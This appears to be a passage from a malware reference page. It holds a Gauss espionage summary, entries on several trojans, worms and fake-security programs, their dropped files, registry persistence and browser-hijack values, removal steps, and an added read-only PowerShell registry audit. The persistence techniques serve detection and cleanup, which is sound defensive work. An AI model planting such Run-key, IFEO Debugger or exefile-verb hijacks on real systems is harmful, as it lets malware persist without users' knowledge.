    system32.dat root folder USB drive
    .CatRoot.tmp root folder USB drive
    Data files and folders Path
    ~shw.tmp %temp%
    ~stm.tmp %temp%
    ws1bin.dat %windir%\Temp
    ws1bin.dat %temp%
    ~gdl.tmp %temp%
    ~mdk.tmp %temp%
    .thumbs.db root folder USB drive
    wabdat.dat %temp%
    desktop.ini inside folders on USB drive
    target.lnk inside folders on USB drive
    .Backup0[D-M] directory on USB drive
    .Backup00[D-M] directory on USB drive
    md.bak %temp%
    s61cs3.dat %systemroot%\Temp\
    s61cs3.dat %temp%
    ~ZM6AD3.tmp %windir%\temp
    browser.js %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    browser.xul %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    fileio.js %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    chrome.manifest %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    lppd.dat %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    install.rdf %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    rssf.dat %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    lfm.dat %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    mppd.dat %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    pddp.dat %AppData%\Roaming\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc} or %AppData%\Mozilla\Firefox\Profiles\*\{a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    pldnrfn.ttf %SystemRoot%\fonts\

    Conclusion

    Gauss is the most recent development from the pool of cyber-espionage projects that includes Stuxnet, Flame and Duqu. It was most likely created in mid-2011 and deployed for the first time in August-September 2011.

    Its geographical distribution is unique; the majority of infections were found in Lebanon, Palestine and Israel. One of the modules from Jan 2012 contains the path 'c:\documents and settings\flamer\desktop\gauss_white_1'. The 'flamer' in the path above is the Windows username that compiled the project. Given the focus on Lebanon, the 'white' version identifier can probably be explained as follows: 'the name Lebanon comes from the Semitic root LBN, meaning "white", likely a reference to the snow-capped Mount Lebanon.' (Wikipedia)

    Code references and encryption subroutines, together with the Command and Control infrastructure make us believe Gauss was created by the same 'factory' which produced Flame. This indicates it is most likely a nation-state sponsored operation.

    Among Gauss' functions, the 'Winshell.ocx' module, which gives the malware its name 'Gauss', steals credentials required to access online banking accounts at several Lebanese banks, including the Bank of Beirut, Byblos Bank and Fransabank. This is the first publicly known nation-state sponsored banking Trojan.

    Another feature which makes Gauss unique is its encrypted payload, which we haven't been able to unlock. The payload is run by infected USB sticks and is designed to surgically target a certain system (or systems) which have a specific program installed. One can only speculate on the purpose of this mysterious payload.

    The discovery of Gauss indicates that there are probably many other related cyber-espionage malware families in operation. The current tensions in the Middle East are just signs of the intensity of these ongoing cyber-war and cyber-espionage campaigns.

     Malware information source: Securelist

  • Technical Details:

    Trojan.Begseabug is a computer Trojan infection that will attempt to connect to a remote server and download additional malicious files. Trojan.Begseabug will modify Windows registry to be able to run itself when Windows is started and bypass any firewall applications.

  • Installation:

    Malicious Files Added by Trojan.Begseabug:

    • %System%\[RANDOM CHARACTERS].exe
    • %System%\system.exe
    • %Temp%\1.tmp
    • %Temp%\IXP000.TMP\Setup4.exe
    • %Temp%\IXP000.TMP\Setup8.exe
    • %Temp%\IXP001.TMP\Setup4.exe
    • %Temp%\IXP001.TMP\Setup8.exe
    • %Temp%\IXP001.TMP\QVODSE~1.EXE

    Associated Windows Registry Entries:

    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 \"%Temp%\IXP000.TMP\\""
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\"wextract_cleanup1" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 \"%Temp%\IXP001.TMP\\""
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"system" = "%System%\system.exe"
  • Remove:
    • Temporarily Disable System Restore (Windows Me/XP).
    • Update the virus definitions.
    • Reboot computer in Safe Mode
    • Run a full system scan and clean/delete all infected file(s)
    • Delete/Modify any values added to the registry.
    • Exit registry editor and restart the computer.
  • Technical Details:

    W32.Virauto is a computer worm that propagates by creating a copy of itself on removable devices and shared network drives. W32.Virauto can open a backdoor port on the compromised computer that will provide unauthorized access to a remote attacker.

  • Installation:

    Malicious Files Added by W32.Virauto:

    • %SystemDrive%\Program Files\Windows NT\explorer.exe
    • %UserProfile%\Local Settings\Temp\[DATE](0).zip
    • %SystemDrive%\Program Files\Windows NT\antivir.dll
    • %SystemDrive%\Program Files\Windows NT\cmd32.exe

    Associated Windows Registry Entries:

    • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\"{01E04581-4EEE-11D0-BFE9-00AA005B4383}" = "[HEXADECIMAL VALUE]"
    • HKEY_CLASSES_ROOT\exefile\shell\syntax0\command\"@" = "C:\Program Files\Windows NT\explorer.exe \"%1\" %*"
    • HKEY_CLASSES_ROOT\exefile\shell\"@" = "syntax0"
  • Remove:
    • Temporarily Disable System Restore (Windows Me/XP).
    • Update the virus definitions.
    • Reboot computer in Safe Mode
    • Run a full system scan and clean/delete all infected file(s)
    • Delete/Modify any values added to the registry.
    • Exit registry editor and restart the computer.
  • Technical Details:

    W32.Buzus!gen is a generic detection used to identify threats that were found related to W32.Buzus family of Trojan. Files detected as W32.Buzus!gen are believed to be malicious and may bring more damage to infected computer if not removed immediately.

  • Remove:
    • If using Windows Me/XP, System Restore must be disabled to prevent the threat from restoring itself.
    • Database, pattern and definition files of installed antivirus programs must be updated.
    • Reboot computer in Safe Mode
    • Run a full system scan and clean/delete all infected file(s)
    • Restart the computer.
  • Technical Details:

    W32.Qakbot!html is a detection for .htm, .cfm, .pl and .php files that have been infected by the W32.Qakbot family to perform malicious actions on the compromised computer.

  • Remove:
    • If using Windows Me/XP, System Restore must be disabled to prevent the threat from restoring itself.
    • Database, pattern and definition files of installed antivirus programs must be updated.
    • Reboot the computer in Safe Mode.
    • Run a full system scan and clean/delete all infected file(s).
    • Restart the computer.
  • Technical Details:

    Adware.Clkpotato!gen2 is a generic detection that identifies malicious programs associated with the Adware.Clickpotato group. Files identified as Adware.Clkpotato!gen2 are deemed harmful and may cause several security risks on the compromised computer.

  • Remove:
    • If using Windows Me/XP, System Restore must be disabled to prevent the threat from restoring itself.
    • Database, pattern and definition files of installed antivirus programs must be updated.
    • Reboot the computer in Safe Mode.
    • Run a full system scan and clean/delete all infected file(s).
    • Restart the computer.
  • Technical Details:

    W32.Qakbot!job is a detection for a malicious job file created by the W32.Qakbot family of computer worms through the Windows Task Scheduler. The job is created in order to run a randomly named JavaScript file.

  • Remove:
    • If using Windows Me/XP, System Restore must be disabled to prevent the threat from restoring itself.
    • Database, pattern and definition files of installed antivirus programs must be updated.
    • Reboot the computer in Safe Mode.
    • Run a full system scan and clean/delete all infected file(s).
    • Restart the computer.
  • Technical Details:

    Windows License Locked! is a ransomware or desktop-locking virus that is distributed disguised as an update file for the Firefox browser. It can be downloaded as the file Firefox_update.exe. The Windows License Locked! virus uses a fake security web site, usually published in French. The program prevents the execution of any installed application and warns the user of possible software errors. It repeatedly prompts the user to activate a copy of Windows by paying for the license, which is actually a scam. The alert contains the following message:

    Windows License Locked!
    This copy of Windows is locked. You maybe a victim of a fraud or there may be an internal system error.
    To continue using Windows you should complete activation.
    Activation is absolutely free and is simply a formality. You do not need to pay for the license and you will not be required to provide any personal data.

    The Windows License Locked! virus is not in any way part of the Windows operating system. It is present on computers already infected with a Trojan. The main purpose of the Windows License Locked! virus is to deceive users into believing their copy of Windows is unlicensed and to force activation by redirecting the browser to an online payment processing web site where credit card information is required.


  • Installation:

    Malicious Files Added by Windows License Locked!:

    Internet-Explorer_update.exe
    4F.tmp
    Chrome_update.exe
    Keygen-AUTODESK_AUTOCAD_MAP_3D_2011_x32_x64.exe
    Install_Flash-Player.exe
    Dc17.exe
    WindowsWebSecurity.exe

    Windows License Locked! Registry Entries:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "[random].exe"
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "WindowsWebSecurity.exe"

  • Remove:
    1. Press Ctrl+Alt+Del on the keyboard to stop the processes associated with "Windows License Locked!". When Windows Task Manager opens, go to the Processes tab, then find and end the following processes: (random characters).exe, WindowsWebSecurity.exe

    2. You need to update your installed antivirus application to have the latest database.
       
    3. Thoroughly scan the computer; any detected threats must be removed. If removal is not possible, it is best to quarantine the infected item. Malicious files should also be located and deleted manually. Please see the files listed above that are related to the Windows License Locked! virus.
       
    4. Registry entries created by Windows License Locked! must also be removed from the Windows system. Please refer to the entries listed above for this rogue program.
       
    5. Exit the registry editor.
       
    6. Get rid of the Windows License Locked! start-up entry by going to Start > Run and typing msconfig in the "Open" dialog box. A window containing the System Configuration Utility will be launched. Go to the Startup tab and uncheck the following start-up item(s): (random characters).exe, WindowsWebSecurity.exe

    7. Click Apply and restart the computer.
  • Technical Details:

    Fake BitDefender 2011 is misleading security software that mimics the legitimate program in order to deceive computer users. Sometimes called the Fake Bit Defender 2011 virus, it belongs to the list of rogue security applications created specifically to be sold through unfair marketing methods. The real BitDefender 2011 can be downloaded from the bitdefender.com web site and must be installed manually, while the rogue one is dropped onto computers and installed without the user's consent. The legitimate product is offered in the variants BitDefender Antivirus Pro, BitDefender Total Security 2011 and BitDefender Internet Security 2011, which offer different levels of protection.

    Fake BitDefender 2011 can enter a computer without being detected because it hides itself on the system by injecting code into a legitimate Windows process. A Trojan is also the reason the fake BitDefender 2011 can manipulate the system without hindrance from any installed security application. It modifies the registry so that it runs whenever Windows starts. Removing the BitDefender 2011 virus is the best way to prevent further harm to the compromised computer. Use only legitimate anti-malware programs to scan the computer and remove fake BitDefender 2011 together with all of its files residing on the system.


  • Installation:

    Malicious Files Added by Fake BitDefender 2011:

    c:\Program Files\BitDefender 2011\
    c:\Program Files\BitDefender 2011\bitdefender.exe
    c:\Documents and Settings\All Users\Start Menu\BitDefender 2011\
    c:\Documents and Settings\All Users\Start Menu\BitDefender 2011\BitDefender 2011.lnk
    %AllUsersProfile%\Start Menu\BitDefender 2011\Uninstall.lnk
    %UserProfile%\Desktop\BitDefender 2011.lnk
    %Temp%\srvED4.ini
    %Temp%\srvED4.tmp

    Fake BitDefender 2011 Registry Entries:
    HKEY_CURRENT_USER\Software\MonEC2
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings "ProxyEnable" = '0'
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "BitDefender 2011" = 'C:\Program Files\BitDefender 2011\bitdefender.exe'
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe "Debugger" = 'msiexecs.exe -sb'
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe "Debugger" = 'msiexecs.exe -sb'
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe "Debugger" = 'msiexecs.exe -sb'
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe "Debugger" = 'msiexecs.exe -sb'
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safari.exe "Debugger" = 'msiexecs.exe -sb'
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform "WinNT-EVI 21.04.2011"

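    The registry entries above, and those listed for W32.Virauto and Windows License Locked! earlier on this page, use three persistence and hijack mechanisms: the default verb of the exefile\shell class, per-user Run keys, and Image File Execution Options "Debugger" values that redirect browser launches to msiexecs.exe. The following read-only PowerShell audit is an added example and is not code from the CERT page or from any vendor it cites; the function names are the example's own, and the only program names it matches on are the ones this page lists. Run it from an elevated prompt so HKLM is fully readable; it prints findings and changes nothing.

```powershell
# Added example (not part of the CERT page): read-only audit of the three
# mechanisms described in these entries. It modifies nothing; compare the
# "Suspicious" rows against the registry entries listed on the page.

function Get-IfeoDebugger {
    # An IFEO "Debugger" value makes Windows start the named program whenever the
    # executable the subkey is named after is launched. Fake BitDefender 2011 uses
    # it on chrome.exe, firefox.exe, iexplore.exe, opera.exe and safari.exe.
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue | ForEach-Object {
        $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            # Any Debugger value is worth a look; legitimate uses are rare.
            [pscustomobject]@{ Mechanism = 'IFEO Debugger'; Key = $_.PSChildName; Value = $dbg; Suspicious = $true }
        }
    }
}

function Get-ExefileShellCommand {
    # The default verb for .exe files is normally "open" and its command is '"%1" %*'.
    # W32.Virauto sets the default verb to "syntax0", whose command runs the worm's
    # own explorer.exe copy first, so every .exe launch passes through it.
    $shell = 'Registry::HKEY_CLASSES_ROOT\exefile\shell'
    $verb = (Get-ItemProperty -Path $shell -ErrorAction SilentlyContinue).'(default)'
    if (-not $verb) { $verb = 'open' }
    $cmd = (Get-ItemProperty -Path "$shell\$verb\command" -ErrorAction SilentlyContinue).'(default)'
    [pscustomobject]@{
        Mechanism  = 'exefile shell'
        Key        = "exefile\shell\$verb\command"
        Value      = $cmd
        Suspicious = ($verb -ne 'open') -or ($cmd -ne '"%1" %*')
    }
}

function Get-RunKeyEntry {
    # Run keys start a program at every logon. Names below are the ones this page
    # lists for Windows License Locked! and Fake BitDefender 2011.
    $knownNames = 'WindowsWebSecurity.exe', 'BitDefender 2011'
    $paths = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
             'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    foreach ($p in $paths) {
        $props = Get-ItemProperty -Path $p -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        $props.PSObject.Properties | Where-Object { $_.Name -notmatch '^PS' } | ForEach-Object {
            # Also flag entries launched from temp or per-user data folders, where
            # droppers commonly place their files.
            $fromUserDir = "$($_.Value)" -match '\\(Temp|AppData|Application Data|Local Settings)\\'
            [pscustomobject]@{
                Mechanism  = 'Run'
                Key        = "$p\$($_.Name)"
                Value      = $_.Value
                Suspicious = $fromUserDir -or ($knownNames -contains $_.Name)
            }
        }
    }
}

& { Get-IfeoDebugger; Get-ExefileShellCommand; Get-RunKeyEntry } |
    Sort-Object Suspicious -Descending |
    Format-Table -AutoSize
```

    A clean system shows no IFEO rows, an exefile row reading open with '"%1" %*', and only recognisable Run entries. Anything flagged Suspicious should be verified against the file lists on this page before the entry is removed in step 4 of the removal procedure below.
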
  • Remove:
    1. Press Ctrl+Alt+Del on the keyboard to stop the process associated with "BitDefender 2011". When Windows Task Manager opens, go to the Processes tab, then find and end the following process: (random characters).exe

    2. You need to update your installed antivirus application to have the latest database.
       
    3. Thoroughly scan the computer; any detected threats must be removed. If removal is not possible, it is best to quarantine the infected item. Malicious files should also be located and deleted manually. Please see the files listed above that are related to the BitDefender 2011 virus.
       
    4. Registry entries created by BitDefender 2011 must also be removed from the Windows system. Please refer to the entries listed above for this rogue program.
       
    5. Exit the registry editor.
       
    6. Get rid of the BitDefender 2011 start-up entry by going to Start > Run and typing msconfig in the "Open" dialog box. A window containing the System Configuration Utility will be launched. Go to the Startup tab and uncheck the following start-up item(s): (random characters).exe, WindowsWebSecurity.exe
       
    7. Click Apply and restart the computer.